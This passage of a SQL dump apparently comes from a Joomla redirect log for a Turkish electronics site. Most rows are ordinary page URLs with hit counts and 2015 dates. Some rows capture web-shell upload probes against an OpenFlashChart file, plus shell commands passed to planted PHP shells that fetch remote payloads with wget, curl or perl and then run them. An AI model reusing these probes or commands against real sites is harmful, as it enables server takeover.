00:00:00',301),(7396,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',40,0,'2015-03-07 10:57:03','0000-00-00 00:00:00',301),(7397,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',35,0,'2015-03-07 10:57:07','0000-00-00 00:00:00',301),(7398,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',40,0,'2015-03-07 10:57:10','0000-00-00 00:00:00',301),(7399,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',35,0,'2015-03-07 10:57:14','0000-00-00 00:00:00',301),(7400,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',37,0,'2015-03-07 10:58:51','0000-00-00 00:00:00',301),(7401,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',32,0,'2015-03-07 10:58:55','0000-00-00 00:00:00',301),(7402,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=73&Itemid=82&lang=tr','','','',39,0,'2015-03-07 10:59:11','0000-00-00 00:00:00',301),(7403,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',33,0,'2015-03-07 10:59:14','0000-00-00 00:00:00',301),(7404,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',37,0,'2015-03-07 10:59:34','0000-00-00 00:00:00',301),(7405,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',32,0,'2015-03-07 10:59:37','0000-00-00 00:00:00',301),(7406,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',37,0,'2015-03-07 10:59:46','0000-00-00 00:00:00',301),(7407,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',32,0,'2015-03-07 10:59:49','0000-00-00 00:00:00',301),(7408,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',37,0,'2015-03-07 11:00:01','0000-00-00 00:00:00',301),(7409,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',32,0,'2015-03-07 11:00:05','0000-00-00 00:00:00',301),(7410,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',32,0,'2015-03-07 11:00:25','0000-00-00 00:00:00',301),(7411,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',31,0,'2015-03-07 11:00:32','0000-00-00 00:00:00',301),(7412,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',37,0,'2015-03-07 11:00:36','0000-00-00 00:00:00',301),(7413,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',40,0,'2015-03-07 11:00:40','0000-00-00 00:00:00',301),(7414,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',40,0,'2015-03-07 11:00:45','0000-00-00 00:00:00',301),(7415,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',38,0,'2015-03-07 11:00:49','0000-00-00 00:00:00',301),(7416,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',38,0,'2015-03-07 11:00:52','0000-00-00 00:00:00',301),(7417,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',35,0,'2015-03-07 11:00:59','0000-00-00 00:00:00',301),(7418,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',34,0,'2015-03-07 11:01:18','0000-00-00 00:00:00',301),(7419,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',35,0,'2015-03-07 11:01:23','0000-00-00 00:00:00',301),(7420,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',34,0,'2015-03-07 11:01:26','0000-00-00 00:00:00',301),(7421,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',32,0,'2015-03-07 11:01:33','0000-00-00 00:00:00',301),(7422,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',32,0,'2015-03-07 11:01:39','0000-00-00 00:00:00',301),(7423,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',32,0,'2015-03-07 11:01:45','0000-00-00 00:00:00',301),(7424,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',32,0,'2015-03-07 11:02:25','0000-00-00 00:00:00',301),(7425,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',32,0,'2015-03-07 11:02:46','0000-00-00 00:00:00',301),(7426,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',29,0,'2015-03-07 11:02:50','0000-00-00 00:00:00',301),(7427,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',32,0,'2015-03-07 11:02:54','0000-00-00 00:00:00',301),(7428,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',32,0,'2015-03-07 11:02:59','0000-00-00 00:00:00',301),(7429,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',33,0,'2015-03-07 11:03:05','0000-00-00 00:00:00',301),(7430,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',32,0,'2015-03-07 11:03:24','0000-00-00 00:00:00',301),(7431,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',32,0,'2015-03-07 11:04:07','0000-00-00 00:00:00',301),(7432,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',33,0,'2015-03-07 11:04:24','0000-00-00 00:00:00',301),(7433,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',32,0,'2015-03-07 11:04:30','0000-00-00 00:00:00',301),(7434,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',41,0,'2015-03-08 09:28:25','0000-00-00 00:00:00',301),(7435,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',34,0,'2015-03-08 09:28:35','0000-00-00 00:00:00',301),(7436,'http://3s-technologies.com.tr/index.php/en/?Itemid=127&id=116&lang=en&option=com_content&view=article','','','',8,0,'2015-03-09 15:09:48','0000-00-00 00:00:00',301),(7437,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:44:58','0000-00-00 00:00:00',301),(7438,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:44:59','0000-00-00 00:00:00',301),(7439,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:45:03','0000-00-00 00:00:00',301),(7440,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:45:07','0000-00-00 00:00:00',301),(7441,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:45:19','0000-00-00 00:00:00',301),(7442,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:45:30','0000-00-00 00:00:00',301),(7443,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:45:33','0000-00-00 00:00:00',301),(7444,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:45:36','0000-00-00 00:00:00',301),(7445,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:45:37','0000-00-00 00:00:00',301),(7446,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:45:41','0000-00-00 00:00:00',301),(7447,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:45:42','0000-00-00 00:00:00',301),(7448,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:45:50','0000-00-00 00:00:00',301),(7449,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:46:03','0000-00-00 00:00:00',301),(7450,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:46:09','0000-00-00 00:00:00',301),(7451,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:46:11','0000-00-00 00:00:00',301),(7452,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:46:14','0000-00-00 00:00:00',301),(7453,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:46:16','0000-00-00 00:00:00',301),(7454,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:46:20','0000-00-00 00:00:00',301),(7455,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:46:22','0000-00-00 00:00:00',301),(7456,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:46:30','0000-00-00 00:00:00',301),(7457,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:46:34','0000-00-00 00:00:00',301),(7458,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:46:50','0000-00-00 00:00:00',301),(7459,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php','','','',1,0,'2015-03-11 12:46:55','0000-00-00 00:00:00',301),(7460,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=jasad.php.pHp','','','',1,0,'2015-03-11 12:46:56','0000-00-00 00:00:00',301),(7461,'http://www.3s-technologies.com.tr/index.php/en/?option=com_user&view=register','','','',4,0,'2015-03-12 13:23:18','0000-00-00 00:00:00',301),(7462,'http://www.3s-technologies.com.tr/index.php/en/component/user/register','','','',4,0,'2015-03-12 13:23:26','0000-00-00 00:00:00',301),(7463,'http://3s-technologies.com.tr/index.php/en/?Itemid=78&id=72&lang=en&option=com_content&view=article','','','',6,0,'2015-03-12 13:31:35','0000-00-00 00:00:00',301),(7464,'http://www.3s-technologies.com.tr/index.php/en/images/stories/arhy.php?rf','','','',1,0,'2015-03-14 19:10:42','0000-00-00 00:00:00',301),(7465,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=Lc4JVeXfIMHwaOiZgOgN&amp;ved=0CPsCEBYwQw&amp;usg=AFQjCNHK7DxVA4ko0_oId0yF82ucppdkvw//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2015-03-18 19:18:29','0000-00-00 00:00:00',301),(7466,'http://www.3s-technologies.com.tr/index.php/en//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',3,0,'2015-03-18 19:18:33','0000-00-00 00:00:00',301),(7467,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',1,0,'2015-03-19 01:14:21','0000-00-00 00:00:00',301),(7468,'http://3s-technologies.com.tr/index.php/en/wp-login.php','','','',7,0,'2015-03-19 19:42:07','0000-00-00 00:00:00',301),(7469,'http://3s-technologies.com.tr/index.php/en/admin.php','','','',1,0,'2015-03-19 19:42:08','0000-00-00 00:00:00',301),(7470,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=guys.php','','','',1,0,'2015-03-21 01:08:55','0000-00-00 00:00:00',301),(7471,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=guys.php','','','',1,0,'2015-03-21 01:08:56','0000-00-00 00:00:00',301),(7472,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list//components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=guys.php','','','',1,0,'2015-03-21 01:08:56','0000-00-00 00:00:00',301),(7473,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf','','','',1,0,'2015-03-21 01:08:57','0000-00-00 00:00:00',301),(7474,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-category-list//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf','','','',1,0,'2015-03-21 01:08:57','0000-00-00 00:00:00',301),(7475,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf','','','',1,0,'2015-03-21 01:08:57','0000-00-00 00:00:00',301),(7476,'http://3s-technologies.com.tr/index.php/en/?Itemid=162&id=159&lang=en&option=com_content&view=article','','','',6,0,'2015-03-22 08:47:52','0000-00-00 00:00:00',301),(7477,'http://3s-technologies.com.tr/index.php/en/?Itemid=57&id=39&lang=tr&option=com_content&view=category','','','',5,0,'2015-03-22 12:12:16','0000-00-00 00:00:00',301),(7478,'http://3s-technologies.com.tr/index.php/en/component/content/article/81-english-uk/english-content/','','','',2,0,'2015-03-23 02:34:28','0000-00-00 00:00:00',301),(7479,'http://3s-technologies.com.tr/index.php/en/?Itemid=138&id=136&lang=en&option=com_content&view=article','','','',6,0,'2015-03-23 08:53:26','0000-00-00 00:00:00',301),(7480,'http://3s-technologies.com.tr/index.php/en/?Itemid=143&id=141&lang=en&option=com_content&view=article','','','',5,0,'2015-03-24 01:07:33','0000-00-00 00:00:00',301),(7481,'http://www.3s-technologies.com.tr/index.php/en/amazoncom-bookstores','','http://www.3s-technologies.com.tr','',1,0,'2015-03-24 09:40:42','0000-00-00 00:00:00',301),(7482,'http://www.3s-technologies.com.tr/index.php?option=com_vitabook','','','',6,0,'2015-03-24 11:54:11','0000-00-00 00:00:00',301),(7483,'http://3s-technologies.com.tr/index.php/en/?Itemid=137&id=56&lang=tr&option=com_content&view=category','','','',6,0,'2015-03-24 16:45:57','0000-00-00 00:00:00',301),(7484,'http://www.3s-technologies.com.tr/index.php/en/?option=com_vitabook','','','',11,0,'2015-03-24 20:54:49','0000-00-00 00:00:00',301),(7485,'http://www.3s-technologies.com.tr/index.php/en//images/stories/stat.gif','','','',3,0,'2015-03-25 22:53:15','0000-00-00 00:00:00',301),(7486,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=-nQUVcf-Ds_KaOzQgbAM&amp;ved=0CB0QFjACOGQ&amp;usg=AFQjCNGJP0xUCi1KzpV2ZHwivhHi01ipHw//wp-admin/admin-ajax.php','','','',1,0,'2015-03-26 21:08:04','0000-00-00 00:00:00',301),(7487,'http://www.3s-technologies.com.tr/index.php/en//wp-admin/admin-ajax.php','','','',4,0,'2015-03-26 21:08:05','0000-00-00 00:00:00',301),(7488,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/plugins?start=7&amp;sa=U&amp;ei=zJgXVbrqJojqaOGrgegN&amp;ved=0CNwDEBYwVjhk&amp;usg=AFQjCNGVfHbyC22cGm2gpWWkBwpwHHysag/wp-content/plugins/highlighter/libs/timthumb.php','','','',1,0,'2015-03-29 06:42:22','0000-00-00 00:00:00',301),(7489,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/wp-content/plugins/highlighter/libs/timthumb.php','','','',1,0,'2015-03-29 06:42:25','0000-00-00 00:00:00',301),(7490,'http://www.3s-technologies.com.tr/index.php/en//wp-login.php','','','',1,0,'2015-04-04 02:59:54','0000-00-00 00:00:00',301),(7491,'http://www.3s-technologies.com.tr/index.php/en//administrator/index.php','','','',1,0,'2015-04-04 02:59:57','0000-00-00 00:00:00',301),(7492,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=mxMgVZzsFNjSoASxloFw&amp;ved=0CEsQFjAKOGQ&amp;usg=AFQjCNGJlCq2tRIAC_rGXutjoniKgvYUcA/images/stories/Myluph.php?read','','','',1,0,'2015-04-04 16:42:15','0000-00-00 00:00:00',301),(7493,'http://www.3s-technologies.com.tr/index.php/en/images/stories/Myluph.php?read','','','',1,0,'2015-04-04 16:42:15','0000-00-00 00:00:00',301),(7494,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=mxMgVZzsFNjSoASxloFw&amp;ved=0CEsQFjAKOGQ&amp;usg=AFQjCNGJlCq2tRIAC_rGXutjoniKgvYUcA/images/stories/Myluph.php?cmd=lwp-download http://chkonsult.org/sp.tar.gz;wget http://chkonsult.org/sp.tar','','','',1,0,'2015-04-04 16:42:16','0000-00-00 00:00:00',301),(7495,'http://www.3s-technologies.com.tr/index.php/en/images/stories/Myluph.php?cmd=lwp-download http://chkonsult.org/sp.tar.gz;wget http://chkonsult.org/sp.tar.gz;curl -O http://chkonsult.org/sp.tar.gz;tar zxvf sp.tar.gz;rm -fr sp.tar*;rm -fr sp.*.gz','','','',1,0,'2015-04-04 16:42:16','0000-00-00 00:00:00',301),(7496,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=mxMgVZzsFNjSoASxloFw&amp;ved=0CEsQFjAKOGQ&amp;usg=AFQjCNGJlCq2tRIAC_rGXutjoniKgvYUcA/images/stories/mybot.php','','','',1,0,'2015-04-04 16:42:17','0000-00-00 00:00:00',301),(7497,'http://www.3s-technologies.com.tr/index.php/en/images/stories/mybot.php','','','',1,0,'2015-04-04 16:42:17','0000-00-00 00:00:00',301),(7498,'http://www.3s-technologies.com.tr/index.php/en/&amp;sa=U&amp;ei=mxMgVZzsFNjSoASxloFw&amp;ved=0CEsQFjAKOGQ&amp;usg=AFQjCNGJlCq2tRIAC_rGXutjoniKgvYUcA/images/stories/mybos.php','','','',3,0,'2015-04-04 16:42:18','0000-00-00 00:00:00',301),(7499,'http://www.3s-technologies.com.tr/index.php/en/images/stories/mybos.php','','','',3,0,'2015-04-04 16:42:18','0000-00-00 00:00:00',301),(7500,'http://www.3s-technologies.com.tr/index.php?option=ftp://2015janeir:snh2323@ftp.uhserver.com/x.php?????','','','',1,0,'2015-04-05 00:01:06','0000-00-00 00:00:00',301),(7501,'http://3s-technologies.com.tr//index.php/tr/iletisim','','','',1,0,'2015-04-07 12:25:42','0000-00-00 00:00:00',301),(7502,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/ly-8c-detail','','','',55,0,'2015-04-11 11:37:57','0000-00-00 00:00:00',301),(7503,'http://3s-technologies.com.tr/index.php/tr/ueruenler','','','',24,0,'2015-04-23 15:22:00','0000-00-00 00:00:00',301),(7504,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',1,0,'2015-04-26 16:34:22','0000-00-00 00:00:00',301),(7505,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',3,0,'2015-04-26 21:19:54','0000-00-00 00:00:00',301),(7506,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',5,0,'2015-04-27 13:09:31','0000-00-00 00:00:00',301),(7507,'http://www.3s-technologies.com.tr/index.php/en/images/jdownloads/screenshots/gelo.php.j','','','',1,0,'2015-04-29 00:09:24','0000-00-00 00:00:00',301),(7508,'http://www.3s-technologies.com.tr/index.php/en/images/jdownloads/screenshots/gelo.php.j?rf','','','',1,0,'2015-04-29 00:09:25','0000-00-00 00:00:00',301),(7509,'http://www.3s-technologies.com.tr/index.php/en/images/jdownloads/screenshots/gelo.php.j?cmd=curl+-C+-+-O+http://freedomteam.ru/EG.txt;perl+EG.txt;rm+EG.txt','','','',1,0,'2015-04-29 00:09:25','0000-00-00 00:00:00',301),(7510,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',1,0,'2015-04-29 00:18:25','0000-00-00 00:00:00',301),(7511,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',7,0,'2015-05-01 18:52:07','0000-00-00 00:00:00',301),(7512,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2015-05-01 20:15:51','0000-00-00 00:00:00',301),(7513,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2015-05-02 01:59:16','0000-00-00 00:00:00',301),(7514,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2015-05-02 23:30:16','0000-00-00 00:00:00',301),(7515,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',1,0,'2015-05-03 03:19:53','0000-00-00 00:00:00',301),(7516,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',1,0,'2015-05-03 06:55:52','0000-00-00 00:00:00',301),(7517,'https://www.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',3,0,'2015-05-04 11:56:02','0000-00-00 00:00:00',301),(7518,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',2,0,'2015-05-05 02:26:11','0000-00-00 00:00:00',301),(7519,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2015-05-05 05:03:40','0000-00-00 00:00:00',301),(7520,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',1,0,'2015-05-05 07:49:02','0000-00-00 00:00:00',301),(7521,'https://www.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',3,0,'2015-05-05 15:10:17','0000-00-00 00:00:00',301),(7522,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h','','','',1,0,'2015-05-05 19:27:37','0000-00-00 00:00:00',301),(7523,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-h','','','',1,0,'2015-05-05 19:29:28','0000-00-00 00:00:00',301),(7524,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-h','','','',1,0,'2015-05-05 19:30:52','0000-00-00 00:00:00',301),(7525,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',1,0,'2015-05-06 03:46:00','0000-00-00 00:00:00',301),(7526,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',1,0,'2015-05-06 10:14:21','0000-00-00 00:00:00',301),(7527,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/article-categories/images/sampledata/parks/banner_cradle.jpg','','','',1,0,'2015-05-06 14:29:54','0000-00-00 00:00:00',301),(7528,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',2,0,'2015-05-07 00:08:38','0000-00-00 00:00:00',301),(7529,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',1,0,'2015-05-07 00:55:12','0000-00-00 00:00:00',301),(7530,'https://nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',1,0,'2015-05-07 12:12:36','0000-00-00 00:00:00',301),(7531,'https://3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',1,0,'2015-05-07 20:25:01','0000-00-00 00:00:00',301),(7532,'https://3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',1,0,'2015-05-08 03:51:30','0000-00-00 00:00:00',301),(7533,'https://nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/en/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',1,0,'2015-05-08 22:26:00','0000-00-00 00:00:00',301),(7534,'https://3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',1,0,'2015-05-09 18:26:36','0000-00-00 00:00:00',301),(7535,'https://3s-technologies.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',2,0,'2015-05-10 02:45:54','0000-00-00 00:00:00',301),(7536,'https://nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',1,0,'2015-05-10 13:33:56','0000-00-00 00:00:00',301),(7537,'https://nova-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',1,0,'2015-05-10 17:43:05','0000-00-00 00:00:00',301),(7538,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/administrator/templates/hathor/images/header/icon-48-help_header.png','','','',2,0,'2015-05-11 